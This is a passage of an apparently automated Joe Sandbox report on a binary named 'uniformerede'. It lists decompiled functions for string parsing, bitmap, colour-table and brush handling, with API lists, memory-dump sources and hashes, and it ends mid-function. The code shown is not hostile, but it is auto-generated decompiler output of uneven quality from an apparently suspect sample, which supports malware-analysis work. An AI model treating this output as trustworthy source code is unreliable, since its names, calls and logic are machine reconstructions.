                                                                                                                                                                                                                            0x0041ce3c
                                                                                                                                                                                                                            0x0041ce3f
                                                                                                                                                                                                                            0x0041ce4d
                                                                                                                                                                                                                            0x0041ce53
                                                                                                                                                                                                                            0x0041ce63
                                                                                                                                                                                                                            0x0041ce6b
                                                                                                                                                                                                                            0x0041ce75
                                                                                                                                                                                                                            0x0041ce83
                                                                                                                                                                                                                            0x0041ce81
                                                                                                                                                                                                                            0x0041ce81
                                                                                                                                                                                                                            0x0041cf3c
                                                                                                                                                                                                                            0x0041cf3e
                                                                                                                                                                                                                            0x0041cf42
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0041ce9b
                                                                                                                                                                                                                            0x0041ceb3
                                                                                                                                                                                                                            0x0041cec1
                                                                                                                                                                                                                            0x0041cec3
                                                                                                                                                                                                                            0x0041cec8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0041cebf
                                                                                                                                                                                                                            0x0041cebf
                                                                                                                                                                                                                            0x0041cedf
                                                                                                                                                                                                                            0x0041ce9d
                                                                                                                                                                                                                            0x0041ceac
                                                                                                                                                                                                                            0x0041ceac
                                                                                                                                                                                                                            0x0041ceec
                                                                                                                                                                                                                            0x0041cefb
                                                                                                                                                                                                                            0x0041cef9
                                                                                                                                                                                                                            0x0041cef9
                                                                                                                                                                                                                            0x0041cf10
                                                                                                                                                                                                                            0x0041cf1d
                                                                                                                                                                                                                            0x0041cf26
                                                                                                                                                                                                                            0x0041cf26
                                                                                                                                                                                                                            0x0041cf29
                                                                                                                                                                                                                            0x0041cf31
                                                                                                                                                                                                                            0x0041cf38
                                                                                                                                                                                                                            0x0041cf29
                                                                                                                                                                                                                            0x0041cf10
                                                                                                                                                                                                                            0x0041cf4a
                                                                                                                                                                                                                            0x0041cf4d
                                                                                                                                                                                                                            0x0041cf50
                                                                                                                                                                                                                            0x0041cf5d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CharNextA.USER32(?,?,00000000,0041CF7B), ref: 0041CE7C
                                                                                                                                                                                                                            • CharNextA.USER32(?,?,00000000,0041CF7B), ref: 0041CEF4
                                                                                                                                                                                                                            • CharNextA.USER32(?,?,00000000,0041CF7B), ref: 0041CF15
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,?,?,00000000,0041CF7B), ref: 0041CF2C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CharNext
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3213498283-3916222277
                                                                                                                                                                                                                            • Opcode ID: 24b7eb0b41e4ee8e508986ba2351e00e2282b7539fe7d38dfc5498590e9056e5
                                                                                                                                                                                                                            • Instruction ID: 11efbd69cb5f73df2cbcf5fefe28e22a1c1bddc5dbaf51a38cd0fed122abd7e5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24b7eb0b41e4ee8e508986ba2351e00e2282b7539fe7d38dfc5498590e9056e5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1415130A44244DFCB11DF79C991999BBF6EF5A30472404AAF4C1D7392C738AD82DB99
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00426AA0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E00426AA0(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, int _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v32;
				signed short _v44;
				int _t36;
				signed int _t37;
				signed short _t38;
				signed int _t39;
				signed short _t43;
				signed int* _t47;
				signed int _t51;
				intOrPtr _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t68 = _t69;
				_t70 = _t69 + 0xffffff90;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t47 = _a8;
				_v24 = _v16 << 4;
				_v20 = E00408D24(_v24, __eflags);
				 *[fs:edx] = _t70;
				_t51 = _v24;
				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x426d97, _t68, __edi, __esi, __ebx, _t67);
				if(( *_t47 | _t47[1]) != 0) {
					_t36 = _a4;
					 *_t36 =  *_t47;
					 *(_t36 + 4) = _t47[1];
				} else {
					 *_a4 = GetSystemMetrics(0xb);
					_t36 = GetSystemMetrics(0xc);
					 *(_a4 + 4) = _t36;
				}
				_push(0);
				L00407638();
				_v44 = _t36;
				if(_v44 == 0) {
					E00425F64(_t51);
				}
				_push(_t68);
				_push(0x426b89);
				_push( *[fs:edx]);
				 *[fs:edx] = _t70;
				_push(0xe);
				_t37 = _v44;
				_push(_t37);
				L00407380();
				_push(0xc);
				_t38 = _v44;
				_push(_t38);
				L00407380();
				_t39 = _t37 * _t38;
				if(_t39 <= 8) {
					__eflags = 1;
					_v32 = 1 << _t39;
				} else {
					_v32 = 0x7fffffff;
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(0x426b90);
				_t43 = _v44;
				_push(_t43);
				_push(0);
				L00407888();
				return _t43;
			}






















                                                                                                                                                                                                                            0x00426aa1
                                                                                                                                                                                                                            0x00426aa3
                                                                                                                                                                                                                            0x00426aa9
                                                                                                                                                                                                                            0x00426aac
                                                                                                                                                                                                                            0x00426aaf
                                                                                                                                                                                                                            0x00426ab2
                                                                                                                                                                                                                            0x00426abb
                                                                                                                                                                                                                            0x00426ac6
                                                                                                                                                                                                                            0x00426ad4
                                                                                                                                                                                                                            0x00426ada
                                                                                                                                                                                                                            0x00426ae2
                                                                                                                                                                                                                            0x00426aea
                                                                                                                                                                                                                            0x00426b07
                                                                                                                                                                                                                            0x00426b0c
                                                                                                                                                                                                                            0x00426b11
                                                                                                                                                                                                                            0x00426aec
                                                                                                                                                                                                                            0x00426af6
                                                                                                                                                                                                                            0x00426afa
                                                                                                                                                                                                                            0x00426b02
                                                                                                                                                                                                                            0x00426b02
                                                                                                                                                                                                                            0x00426b14
                                                                                                                                                                                                                            0x00426b16
                                                                                                                                                                                                                            0x00426b1b
                                                                                                                                                                                                                            0x00426b22
                                                                                                                                                                                                                            0x00426b24
                                                                                                                                                                                                                            0x00426b24
                                                                                                                                                                                                                            0x00426b2b
                                                                                                                                                                                                                            0x00426b2c
                                                                                                                                                                                                                            0x00426b31
                                                                                                                                                                                                                            0x00426b34
                                                                                                                                                                                                                            0x00426b37
                                                                                                                                                                                                                            0x00426b39
                                                                                                                                                                                                                            0x00426b3c
                                                                                                                                                                                                                            0x00426b3d
                                                                                                                                                                                                                            0x00426b44
                                                                                                                                                                                                                            0x00426b46
                                                                                                                                                                                                                            0x00426b49
                                                                                                                                                                                                                            0x00426b4a
                                                                                                                                                                                                                            0x00426b53
                                                                                                                                                                                                                            0x00426b59
                                                                                                                                                                                                                            0x00426b6b
                                                                                                                                                                                                                            0x00426b6d
                                                                                                                                                                                                                            0x00426b5b
                                                                                                                                                                                                                            0x00426b5b
                                                                                                                                                                                                                            0x00426b5b
                                                                                                                                                                                                                            0x00426b72
                                                                                                                                                                                                                            0x00426b75
                                                                                                                                                                                                                            0x00426b78
                                                                                                                                                                                                                            0x00426b7d
                                                                                                                                                                                                                            0x00426b80
                                                                                                                                                                                                                            0x00426b81
                                                                                                                                                                                                                            0x00426b83
                                                                                                                                                                                                                            0x00426b88

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 00426AEE
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 00426AFA
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 00426B16
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000000E,00000000,00426B89,?,00000000), ref: 00426B3D
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,00426B89,?,00000000), ref: 00426B4A
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00426B90,0000000E,00000000,00426B89,?,00000000), ref: 00426B83
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MetricsSystem$B380
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3145338429-0
                                                                                                                                                                                                                            • Opcode ID: fe6f9d9fad2ee4ecbfc1d9d7efc59859acc1fc1413ed063bf02da4aa932c8209
                                                                                                                                                                                                                            • Instruction ID: 72199b77af9d5ad6b2438074c355ca19ed48f1e35d4323483afc0bacfeaa441d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe6f9d9fad2ee4ecbfc1d9d7efc59859acc1fc1413ed063bf02da4aa932c8209
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90316F74E00214AFEB00EF65C841AAEBBF5FB49750F51856AE814AB394C638A941CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00426F10 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 45%
                                                                                                                                                                                                                            			E00426F10(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				struct HDC__* _t29;
				struct tagBITMAPINFO* _t32;
				intOrPtr _t39;
				struct HBITMAP__* _t43;
				void* _t46;

				_t32 = __ecx;
				_t43 = __eax;
				E00426DC0(__eax, _a4, __ecx);
				_v12 = 0;
				_push(0);
				L004072E0();
				_v16 = 0;
				_push(_t46);
				_push(0x426fad);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff4;
				if(__edx != 0) {
					_push(0);
					_push(__edx);
					_t29 = _v16;
					_push(_t29);
					L00407440();
					_v12 = _t29;
					_push(_v16);
					L00407418();
				}
				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(0x426fb4);
				if(_v12 != 0) {
					_push(0);
					_push(_v12);
					_push(_v16);
					L00407440();
				}
				return DeleteDC(_v16);
			}











                                                                                                                                                                                                                            0x00426f19
                                                                                                                                                                                                                            0x00426f1d
                                                                                                                                                                                                                            0x00426f26
                                                                                                                                                                                                                            0x00426f2d
                                                                                                                                                                                                                            0x00426f30
                                                                                                                                                                                                                            0x00426f32
                                                                                                                                                                                                                            0x00426f37
                                                                                                                                                                                                                            0x00426f3c
                                                                                                                                                                                                                            0x00426f3d
                                                                                                                                                                                                                            0x00426f42
                                                                                                                                                                                                                            0x00426f45
                                                                                                                                                                                                                            0x00426f4a
                                                                                                                                                                                                                            0x00426f4c
                                                                                                                                                                                                                            0x00426f4e
                                                                                                                                                                                                                            0x00426f4f
                                                                                                                                                                                                                            0x00426f52
                                                                                                                                                                                                                            0x00426f53
                                                                                                                                                                                                                            0x00426f58
                                                                                                                                                                                                                            0x00426f5e
                                                                                                                                                                                                                            0x00426f5f
                                                                                                                                                                                                                            0x00426f5f
                                                                                                                                                                                                                            0x00426f7d
                                                                                                                                                                                                                            0x00426f83
                                                                                                                                                                                                                            0x00426f86
                                                                                                                                                                                                                            0x00426f89
                                                                                                                                                                                                                            0x00426f92
                                                                                                                                                                                                                            0x00426f94
                                                                                                                                                                                                                            0x00426f99
                                                                                                                                                                                                                            0x00426f9d
                                                                                                                                                                                                                            0x00426f9e
                                                                                                                                                                                                                            0x00426f9e
                                                                                                                                                                                                                            0x00426fac

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00426DC0: GetObjectA.GDI32(?,00000054), ref: 00426DD4
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000), ref: 00426F32
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,?,00000000,00000000,00426FAD,?,00000000), ref: 00426F53
                                                                                                                                                                                                                            • 73C9B150.GDI32(?,?,?,00000000,00000000,00426FAD,?,00000000), ref: 00426F5F
                                                                                                                                                                                                                            • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00426F76
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,00000000,00000000,00426FB4,?,00000000), ref: 00426F9E
                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 00426FA7
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B410$A590B150BitsDeleteObject
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3837315262-0
                                                                                                                                                                                                                            • Opcode ID: cf66ecea4cbc03e348312b4209bf1e0b5033cbc5b509529efbc9ca410bba2e7b
                                                                                                                                                                                                                            • Instruction ID: 77de815d1256251625e09d43045054b0a879545964fd81c4b279a3d00da1559d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf66ecea4cbc03e348312b4209bf1e0b5033cbc5b509529efbc9ca410bba2e7b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2114F75F082047FDB10DBA9DC41F9EBBECEB48714F5284AAB914E7281D678A900C769
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00473BA4 Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 45%
                                                                                                                                                                                                                            			E00473BA4(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				struct HDC__* _t29;
				struct tagBITMAPINFO* _t32;
				intOrPtr _t39;
				struct HBITMAP__* _t43;
				void* _t46;

				_t32 = __ecx;
				_t43 = __eax;
				E00473A5C(__eax, _a4, __ecx);
				_v12 = 0;
				_push(0);
				L004072E0();
				_v16 = 0;
				_push(_t46);
				_push(0x473c41);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff4;
				if(__edx != 0) {
					_push(0);
					_push(__edx);
					_t29 = _v16;
					_push(_t29);
					L00407440();
					_v12 = _t29;
					_push(_v16);
					L00407418();
				}
				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(0x473c48);
				if(_v12 != 0) {
					_push(0);
					_push(_v12);
					_push(_v16);
					L00407440();
				}
				return DeleteDC(_v16);
			}











                                                                                                                                                                                                                            0x00473bad
                                                                                                                                                                                                                            0x00473bb1
                                                                                                                                                                                                                            0x00473bba
                                                                                                                                                                                                                            0x00473bc1
                                                                                                                                                                                                                            0x00473bc4
                                                                                                                                                                                                                            0x00473bc6
                                                                                                                                                                                                                            0x00473bcb
                                                                                                                                                                                                                            0x00473bd0
                                                                                                                                                                                                                            0x00473bd1
                                                                                                                                                                                                                            0x00473bd6
                                                                                                                                                                                                                            0x00473bd9
                                                                                                                                                                                                                            0x00473bde
                                                                                                                                                                                                                            0x00473be0
                                                                                                                                                                                                                            0x00473be2
                                                                                                                                                                                                                            0x00473be3
                                                                                                                                                                                                                            0x00473be6
                                                                                                                                                                                                                            0x00473be7
                                                                                                                                                                                                                            0x00473bec
                                                                                                                                                                                                                            0x00473bf2
                                                                                                                                                                                                                            0x00473bf3
                                                                                                                                                                                                                            0x00473bf3
                                                                                                                                                                                                                            0x00473c11
                                                                                                                                                                                                                            0x00473c17
                                                                                                                                                                                                                            0x00473c1a
                                                                                                                                                                                                                            0x00473c1d
                                                                                                                                                                                                                            0x00473c26
                                                                                                                                                                                                                            0x00473c28
                                                                                                                                                                                                                            0x00473c2d
                                                                                                                                                                                                                            0x00473c31
                                                                                                                                                                                                                            0x00473c32
                                                                                                                                                                                                                            0x00473c32
                                                                                                                                                                                                                            0x00473c40

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00473A5C: GetObjectA.GDI32(?,00000054,?), ref: 00473A75
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000), ref: 00473BC6
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,?,00000000,00000000,00473C41,?,00000000), ref: 00473BE7
                                                                                                                                                                                                                            • 73C9B150.GDI32(?,?,?,00000000,00000000,00473C41,?,00000000), ref: 00473BF3
                                                                                                                                                                                                                            • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00473C0A
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,00000000,00000000,00473C48,00000000,?,?,?,00000000,00000000,00473C41,?,00000000), ref: 00473C32
                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 00473C3B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B410$A590B150BitsDeleteObject
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3837315262-0
                                                                                                                                                                                                                            • Opcode ID: 3b15324fb2290ca1488513c0eeb56040cb136c7a7d0ea080c595af7f481eebf9
                                                                                                                                                                                                                            • Instruction ID: 2e63988e96734921cea6db955d31d5c4bae8c35103de8be847097433fcca094d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b15324fb2290ca1488513c0eeb56040cb136c7a7d0ea080c595af7f481eebf9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E114275E042047FDB11DFA98C42F9EBBEC9B48714F5084AAB918F7281D678AA009769
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00426750 Relevance: 9.1, APIs: 6, Instructions: 55COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                            			E00426750(struct HDC__* __eax, signed int __ecx) {
				char _v1036;
				signed int _v1038;
				struct tagRGBQUAD _v1048;
				short _v1066;
				short* _t15;
				void* _t18;
				struct HDC__* _t23;
				void* _t26;
				short* _t31;
				short* _t32;

				_t31 = 0;
				 *_t32 = 0x300;
				if(__eax == 0) {
					_v1038 = __ecx;
					E004029DC(_t26, __ecx << 2,  &_v1036);
				} else {
					_push(0);
					L004072E0();
					_t23 = __eax;
					_t18 = SelectObject(__eax, __eax);
					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
					SelectObject(_t23, _t18);
					DeleteDC(_t23);
				}
				if(_v1038 != 0) {
					if(_v1038 != 0x10 || E004266B8(_t32) == 0) {
						E00426548( &_v1036, _v1038 & 0x0000ffff);
					}
					_t15 = _t32;
					_push(_t15);
					L00407308();
					_t31 = _t15;
				}
				return _t31;
			}













                                                                                                                                                                                                                            0x0042675b
                                                                                                                                                                                                                            0x0042675d
                                                                                                                                                                                                                            0x00426765
                                                                                                                                                                                                                            0x0042679f
                                                                                                                                                                                                                            0x004267ad
                                                                                                                                                                                                                            0x00426767
                                                                                                                                                                                                                            0x00426767
                                                                                                                                                                                                                            0x00426769
                                                                                                                                                                                                                            0x0042676e
                                                                                                                                                                                                                            0x00426772
                                                                                                                                                                                                                            0x0042678b
                                                                                                                                                                                                                            0x00426792
                                                                                                                                                                                                                            0x00426798
                                                                                                                                                                                                                            0x00426798
                                                                                                                                                                                                                            0x004267b8
                                                                                                                                                                                                                            0x004267c0
                                                                                                                                                                                                                            0x004267d6
                                                                                                                                                                                                                            0x004267d6
                                                                                                                                                                                                                            0x004267db
                                                                                                                                                                                                                            0x004267dd
                                                                                                                                                                                                                            0x004267de
                                                                                                                                                                                                                            0x004267e3
                                                                                                                                                                                                                            0x004267e3
                                                                                                                                                                                                                            0x004267f0

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000,00000000,?,?,0042A2D3,?,?,?,?,00428DD3,00000000,00428E5F), ref: 00426769
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00426772
                                                                                                                                                                                                                            • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,0042A2D3,?,?,?,?,00428DD3), ref: 00426786
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00426792
                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00426798
                                                                                                                                                                                                                            • 73C9A8F0.GDI32(?,00000000,?,?,0042A2D3,?,?,?,?,00428DD3,00000000,00428E5F), ref: 004267DE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ObjectSelect$A590ColorDeleteTable
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1056449717-0
                                                                                                                                                                                                                            • Opcode ID: 0bb8fb8edcdc7087e5e3f325450ea8167a7ed7ac943ba32b5a45adc2cc887e54
                                                                                                                                                                                                                            • Instruction ID: efc5091b96ee346cfcb1bb7471c8c7bb22fdf2c070b44c7d61a8e62d02ab9fa2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0bb8fb8edcdc7087e5e3f325450ea8167a7ed7ac943ba32b5a45adc2cc887e54
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8701847160832061E2246766AC43A6B72AC9FC0758F41882FB988A72C1E67C9845D3AB
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00425E34 Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00425E34(void* __eax) {
				void* _t36;

				_t36 = __eax;
				UnrealizeObject(E00425610( *((intOrPtr*)(__eax + 0x14))));
				SelectObject( *(_t36 + 4), E00425610( *((intOrPtr*)(_t36 + 0x14))));
				if(E004256F0( *((intOrPtr*)(_t36 + 0x14))) != 0) {
					SetBkColor( *(_t36 + 4),  !(E00424950(E004255D4( *((intOrPtr*)(_t36 + 0x14))))));
					return SetBkMode( *(_t36 + 4), 1);
				} else {
					SetBkColor( *(_t36 + 4), E00424950(E004255D4( *((intOrPtr*)(_t36 + 0x14)))));
					return SetBkMode( *(_t36 + 4), 2);
				}
			}




                                                                                                                                                                                                                            0x00425e35
                                                                                                                                                                                                                            0x00425e40
                                                                                                                                                                                                                            0x00425e52
                                                                                                                                                                                                                            0x00425e61
                                                                                                                                                                                                                            0x00425e9b
                                                                                                                                                                                                                            0x00425eac
                                                                                                                                                                                                                            0x00425e63
                                                                                                                                                                                                                            0x00425e75
                                                                                                                                                                                                                            0x00425e86
                                                                                                                                                                                                                            0x00425e86

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00425610: CreateBrushIndirect.GDI32(?), ref: 004256BA
                                                                                                                                                                                                                            • UnrealizeObject.GDI32(00000000), ref: 00425E40
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00425E52
                                                                                                                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00425E75
                                                                                                                                                                                                                            • SetBkMode.GDI32(?,00000002), ref: 00425E80
                                                                                                                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00425E9B
                                                                                                                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 00425EA6
                                                                                                                                                                                                                              • Part of subcall function 00424950: GetSysColor.USER32(?), ref: 0042495A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3527656728-0
                                                                                                                                                                                                                            • Opcode ID: 29ec3b8dcb5869ceba3248ca83c7fd6d6bfb65d219b60a6aaf33f7a556ae5792
                                                                                                                                                                                                                            • Instruction ID: f3953004702be4b33cbf574d844c3777e64eede3f5404583a563c06caea0bc6c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 29ec3b8dcb5869ceba3248ca83c7fd6d6bfb65d219b60a6aaf33f7a556ae5792
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AEF0BBB56001109BCE04FFBAE9C6E1B7B9C5F04309780845AB908EF297C979E850473A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00475658 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 160COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 60%
                                                                                                                                                                                                                            			E00475658(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed char* _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _t79;
